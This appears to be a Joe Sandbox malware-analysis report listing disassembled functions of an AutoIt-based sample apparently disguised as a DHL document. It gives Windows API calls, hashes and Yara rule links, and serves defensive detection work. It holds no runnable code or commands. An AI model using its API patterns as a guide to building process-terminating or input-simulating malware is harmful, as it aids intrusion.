                                                                                        • String ID:
                                                                                        • API String ID: 650687236-0
                                                                                        • Opcode ID: c9de490c4629ae2f38eb3fe5d2cf8497308794a1d947d5de27fd0dfed071048f
                                                                                        • Instruction ID: 18a7a707acd50e31e648c91dd6f20a190072b614c859a5f53d8caab841aaf26b
                                                                                        • Opcode Fuzzy Hash: c9de490c4629ae2f38eb3fe5d2cf8497308794a1d947d5de27fd0dfed071048f
                                                                                        • Instruction Fuzzy Hash: 7F517F75E00615EFCF11EF64C845AAEB7B4EF48324F10406AE851BB392CB74AE41DB94
                                                                                        Function 00C5EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C5EF06
                                                                                        • VariantClear.OLEAUT32(00000013), ref: 00C5EF78
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00C5EFD3
                                                                                        • _memmove.LIBCMT ref: 00C5EFFD
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C5F04A
                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C5F078
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1101466143-0
                                                                                        • Opcode ID: b163662683f8dff6c34fa0015e0f089336dfe92f374f09cc11412e1c31dbd12c
                                                                                        • Instruction ID: bba632586380b30169bc197303260906db96085bccb3a73244393d50ad14bcd4
                                                                                        • Opcode Fuzzy Hash: b163662683f8dff6c34fa0015e0f089336dfe92f374f09cc11412e1c31dbd12c
                                                                                        • Instruction Fuzzy Hash: 2F516D75A00209DFCB14CF58C884AAAB7B8FF8C310B15856EED59DB341E730E955CB94
                                                                                        Function 00C6220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62258
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C622A3
                                                                                        • IsMenu.USER32(00000000), ref: 00C622C3
                                                                                        • CreatePopupMenu.USER32 ref: 00C622F7
                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00C62355
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C62386
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: e710f769b7522fe894b1b60e395b9704f1b3d9b3c2002162c8068cbf75edde4f
                                                                                        • Instruction ID: 1909e24e5b4c576921be31cdb62c382260c7a1efe24dbfbb64c90884eb6132a1
                                                                                        • Opcode Fuzzy Hash: e710f769b7522fe894b1b60e395b9704f1b3d9b3c2002162c8068cbf75edde4f
                                                                                        • Instruction Fuzzy Hash: FF518C70A00A4AEBDF31CF68D8C8BADBBF9BF45314F104139E861A72A0D7749A45CB51
                                                                                        Function 00C01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00C0179A
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C017FE
                                                                                        • ScreenToClient.USER32(?,?), ref: 00C0181B
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C0182C
                                                                                        • EndPaint.USER32(?,?), ref: 00C01876
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 1827037458-0
                                                                                        • Opcode ID: 1b4a4331b3266b4aceeca3d1c90aa6fb9e9059b59db4a2b0bd13e3d8f02859de
                                                                                        • Instruction ID: 22ca8b66812da4ea62d7cd7e2d4758bdbe30fc5976484e1968b82fe79d28ea41
                                                                                        • Opcode Fuzzy Hash: 1b4a4331b3266b4aceeca3d1c90aa6fb9e9059b59db4a2b0bd13e3d8f02859de
                                                                                        • Instruction Fuzzy Hash: 40417E71504700AFD710DF25CC88FAABBE8EB46724F18466DFAA4871E1D730AD45DB62
                                                                                        Function 00C7709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00C74E41,?,?,00000000,00000001), ref: 00C770AC
                                                                                          • Part of subcall function 00C739A0: GetWindowRect.USER32(?,?), ref: 00C739B3
                                                                                        • GetDesktopWindow.USER32 ref: 00C770D6
                                                                                        • GetWindowRect.USER32(00000000), ref: 00C770DD
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C7710F
                                                                                          • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        • GetCursorPos.USER32(?), ref: 00C7713B
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C77199
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: b8da42b20358c237658dfe2b67f52b02b53e86b44a6981e065fc8f1a767870d2
                                                                                        • Instruction ID: 4c91ae6a9418aa8018b9ecc96511ce42199e8f0ca1c48cbdbff26b04f187ff74
                                                                                        • Opcode Fuzzy Hash: b8da42b20358c237658dfe2b67f52b02b53e86b44a6981e065fc8f1a767870d2
                                                                                        • Instruction Fuzzy Hash: 6231D272609309ABD720DF14D849B9FB7A9FF88314F004A19F59997191CB70EA09CB96
                                                                                        Function 00C58879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C580C0
                                                                                          • Part of subcall function 00C580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C580CA
                                                                                          • Part of subcall function 00C580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C580D9
                                                                                          • Part of subcall function 00C580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C580E0
                                                                                          • Part of subcall function 00C580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C580F6
                                                                                        • GetLengthSid.ADVAPI32(?,00000000,00C5842F), ref: 00C588CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C588D6
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C588DD
                                                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C588F6
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00C5842F), ref: 00C5890A
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00C58911
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                        • String ID:
                                                                                        • API String ID: 3008561057-0
                                                                                        • Opcode ID: b194e6d45d0bc99fa42bd817d5f7db1de52da46d271e7ce9e6db4f6ba2722396
                                                                                        • Instruction ID: e4bb3becf4987b075a0a5a69f6f144f634f2eba2aa14bc9bfc6e32ef9649a7ec
                                                                                        • Opcode Fuzzy Hash: b194e6d45d0bc99fa42bd817d5f7db1de52da46d271e7ce9e6db4f6ba2722396
                                                                                        • Instruction Fuzzy Hash: B411B135501209FFDB109FA4DC09BBEB768EB45316F10402DE895E7210CB32AE99DB68
                                                                                        Function 00C585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C585E2
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C585E9
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C585F8
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00C58603
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C58632
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C58646
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: efbbe600e943e01f5d350a06a6450e4762cbf1470dfd26f8a8332b2e89a0b22c
                                                                                        • Instruction ID: 13f06bfcb1639a60b98a4d8717a440951771c94268f69954478344d0bbb81f5e
                                                                                        • Opcode Fuzzy Hash: efbbe600e943e01f5d350a06a6450e4762cbf1470dfd26f8a8332b2e89a0b22c
                                                                                        • Instruction Fuzzy Hash: 7011607650120DAFEF018F94DD49FDE7BA9EF08305F144069FE04A2160C7718E69EB64
                                                                                        Function 00C5B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00C5B7B5
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C5B7C6
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C5B7CD
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C5B7D5
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C5B7EC
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00C5B7FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 53b8764b89d2abf361fe7c04d60896928273f0ac95e7063be80fcaa463303ce6
                                                                                        • Instruction ID: 7013edaf019d3c23c1940bdd8acaa755e2a654b1da6e607ac53f33a7afc90def
                                                                                        • Opcode Fuzzy Hash: 53b8764b89d2abf361fe7c04d60896928273f0ac95e7063be80fcaa463303ce6
                                                                                        • Instruction Fuzzy Hash: 48018475E00219BBEF109BA69C49B5EBFB8EB48351F004179FE04E7291D6309D11CFA4
                                                                                        Function 00C20162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C20193
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C2019B
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C201A6
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C201B1
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C201B9
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C201C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: e169784b425b62d3aac8fff735cf1554d19494c8f5ba148e6fee85817daebeae
                                                                                        • Instruction ID: 92be4889615a0c5852d6e1c5de77df5e5cb7b238164ee3e0da1cef600e38fdea
                                                                                        • Opcode Fuzzy Hash: e169784b425b62d3aac8fff735cf1554d19494c8f5ba148e6fee85817daebeae
                                                                                        • Instruction Fuzzy Hash: DC0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15887941C7B5A864CBE5
                                                                                        Function 00C653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C653F9
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C6540F
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00C6541E
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C6542D
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C65437
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C6543E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 7cd32d0becbce412e98e57e7a758f9ad9260362c68abe54a7a8e5a7640c401a5
                                                                                        • Instruction ID: ed5b093c5dc42cc844ba78eb84c8104da791f350c09d81f8ba15b0dae73dc2a2
                                                                                        • Opcode Fuzzy Hash: 7cd32d0becbce412e98e57e7a758f9ad9260362c68abe54a7a8e5a7640c401a5
                                                                                        • Instruction Fuzzy Hash: C8F01231241558BBD7215B929C0DFAF7A7CEFC6B11F00016DF904D1051E6A51A1287B9
                                                                                        Function 00C67230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00C67243
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00C10EE4,?,?), ref: 00C67254
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00C10EE4,?,?), ref: 00C67261
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C10EE4,?,?), ref: 00C6726E
                                                                                          • Part of subcall function 00C66C35: CloseHandle.KERNEL32(00000000,?,00C6727B,?,00C10EE4,?,?), ref: 00C66C3F
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C67281
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00C10EE4,?,?), ref: 00C67288
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: ed68abd11e8e403a2e53b182c66691ca291c15ce67a508628281f1e89eb87549
                                                                                        • Instruction ID: 9b79993fb3940389bcaeda7d3578175eeee224dafaf4ca032155d8188880b809
                                                                                        • Opcode Fuzzy Hash: ed68abd11e8e403a2e53b182c66691ca291c15ce67a508628281f1e89eb87549
                                                                                        • Instruction Fuzzy Hash: 8FF08236540612EBD7211B64ED8CBDF7739FF45702B100639F603A10A1DB7A5912CB54
                                                                                        Function 00C58992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C5899D
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00C589A9
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C589B2
                                                                                        • CloseHandle.KERNEL32(?), ref: 00C589BA
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00C589C3
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00C589CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 47805a473d19e0d6ef8e602914abde5dcf9c51d76479669ff8966897a87397ca
                                                                                        • Instruction ID: ac0867311a33a02ddec9ed25de5c70f0e0e531b0d8c16ee54be4852f46af3560
                                                                                        • Opcode Fuzzy Hash: 47805a473d19e0d6ef8e602914abde5dcf9c51d76479669ff8966897a87397ca
                                                                                        • Instruction Fuzzy Hash: 66E05276104505FBDA021FE5EC0CB5EBB69FB89762B508639F219C1474CB329462DB58
                                                                                        Function 00C785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C78613
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00C78722
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C7889A
                                                                                          • Part of subcall function 00C67562: VariantInit.OLEAUT32(00000000), ref: 00C675A2
                                                                                          • Part of subcall function 00C67562: VariantCopy.OLEAUT32(00000000,?), ref: 00C675AB
                                                                                          • Part of subcall function 00C67562: VariantClear.OLEAUT32(00000000), ref: 00C675B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: 5142be04ed65b8404164126019b0dc6ad95351c69da6ed20fb92a4a42849246c
                                                                                        • Instruction ID: 1c4718adb925f0e0e004ddf16d3ca7afe960204b157ad5f5f088d93e6e241a67
                                                                                        • Opcode Fuzzy Hash: 5142be04ed65b8404164126019b0dc6ad95351c69da6ed20fb92a4a42849246c
                                                                                        • Instruction Fuzzy Hash: 68918074608301DFCB10DF25C48495BBBE4EF89714F14896EF99A8B3A2DB31E949CB52
                                                                                        Function 00C62A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C1FC86: _wcscpy.LIBCMT ref: 00C1FCA9
                                                                                        • _memset.LIBCMT ref: 00C62B87
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C62BB6
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C62C69
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C62C97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: 31bf825962d23c06d82d000c10df0cc0a59f705e8618618f4587bab6c4d6b59a
                                                                                        • Instruction ID: a5cf98bfe8d336b13cf301c573381725cccbe7aed1b9870c30ff1facf3fea29c
                                                                                        • Opcode Fuzzy Hash: 31bf825962d23c06d82d000c10df0cc0a59f705e8618618f4587bab6c4d6b59a
